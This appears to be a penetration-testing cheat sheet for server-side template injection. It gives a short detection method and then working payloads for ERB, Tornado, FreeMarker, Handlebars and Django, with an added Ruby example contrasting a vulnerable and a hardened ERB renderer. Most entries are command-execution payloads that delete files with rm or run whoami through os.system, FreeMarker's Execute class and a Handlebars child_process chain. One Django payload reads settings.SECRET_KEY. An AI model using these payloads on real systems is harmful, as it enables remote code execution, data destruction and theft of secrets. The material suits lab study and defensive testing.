# Server Side Template Injection

```bash
Methods to find SSTI
1. First, find the place where user input is reflected into the rendered page (the candidate template)
2. Supply irregular input (quotes, braces, ${, <%) and use the resulting errors or output to identify the template engine
3. Send an arbitrary-expression payload such as {{7*7}} or <%= 7*7 %> to confirm the input is evaluated as template code
4. If SSTI is confirmed, use the payloads for the identified engine below to exploit it
```

* [ ] ERB (Ruby) Template injection

```bash
* URL-encode the payloads before sending them in a request parameter

| ERB TEMPLATE |

<%= 7 * 7 %> | arbitrary expression; renders 49 if the input is evaluated as template code
<%= system("rm /home/carlos/morale.txt") %> | arbitrary command execution (deletes a file)
```
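The following is an added example, not code from the original cheat sheet, showing why the ERB probe above works and what the fix looks like. It builds a hypothetical greeting page two ways: a vulnerable renderer that concatenates user input into the template source before ERB compiles it, and a hardened one where the template is fixed and the input is passed only as data via `result_with_hash`. The `ssti?` helper applies step 3 of the method above (send `<%= 7 * 7 %>`, see whether it comes back as `49` or is echoed literally); the renderer names and the greeting template are assumptions made for the example.

```ruby
require "erb"

# Probe from the cheat sheet above: evaluates to 49 only if the input
# reaches ERB as template source rather than as data.
ERB_PROBE = "<%= 7 * 7 %>"

# VULNERABLE (hypothetical page): the untrusted value is interpolated into the
# template string before ERB compiles it, so any <%= ... %> inside the value is
# executed as Ruby. A system("...") payload here would run on the server.
def render_vulnerable(name)
  template = "Hello, #{name}!"     # user input becomes template source
  ERB.new(template).result(binding)
end

# HARDENED: the template is a constant written by the developer and compiled
# once. User input only ever arrives through result_with_hash as a variable,
# so ERB never parses it. html_escape also closes the reflected-XSS gap.
SAFE_TEMPLATE = ERB.new("Hello, <%= ERB::Util.html_escape(name) %>!")

def render_safe(name)
  SAFE_TEMPLATE.result_with_hash(name: name)
end

# Step 3 of the method: send the arithmetic probe and check whether the
# engine evaluated it (49 appears, the source expression does not).
def ssti?(renderer)
  out = renderer.call(ERB_PROBE)
  out.include?("49") && !out.include?("7 * 7")
end

if __FILE__ == $0
  puts render_vulnerable(ERB_PROBE)        # Hello, 49!
  puts render_safe(ERB_PROBE)              # Hello, &lt;%= 7 * 7 %&gt;!
  puts ssti?(method(:render_vulnerable))   # true
  puts ssti?(method(:render_safe))         # false
end
```

The distinction to carry into code review is not which engine is used but which side of `ERB.new` the user input lands on: anything concatenated into the template string is code, anything passed in through the binding or hash is data.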

* [ ] Tornado Template Injection

```bash
{{7*7}} = 49 | arbitrary expression to check for template injection

{% import os %}

{{os.system('whoami')}}
{{os.system('rm /your/directory/here')}} | arbitrary command execution
```

* [ ] FreeMarker Template Injection

{% code overflow="wrap" %}

```bash
${foobar} | referencing an undefined variable makes FreeMarker return an error in the response, which confirms SSTI and identifies the engine
The ?new built-in in FreeMarker templates is dangerous: it instantiates an arbitrary Java class, which attackers use to get RCE
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") }
```

{% endcode %}

* [ ] Handlebars Template Injection

{% code overflow="wrap" %}

```bash
wrtz{{#with "s" as |string|}}
    {{#with "e"}}
        {{#with split as |conslist|}}
            {{this.pop}}
            {{this.push (lookup string.sub "constructor")}}
            {{this.pop}}
            {{#with string.split as |codelist|}}
                {{this.pop}}
                {{this.push "return require('child_process').exec('rm /home/carlos/morale.txt');"}}
                {{this.pop}}
                {{#each conslist}}
                    {{#with (string.sub.apply 0 codelist)}}
                        {{this}}
                    {{/with}}
                {{/each}}
            {{/with}}
        {{/with}}
    {{/with}}
{{/with}}

Payload by @Zombiehelp54 | URL-encode it first
```

{% endcode %}

* [ ] SSTI in Django based Templates

{% code overflow="wrap" %}

```bash
{{7*7}} | pass an arbitrary expression to check for SSTI; the output or error message also fingerprints the template engine

Django templates ship with the built-in {% debug %} tag, which dumps the current template context:

{% debug %}

Inspect the output: if the settings object has been passed into the template context, it is readable directly from the template
{{settings.SECRET_KEY}} | reads the secret key from the exposed settings object
```

{% endcode %}
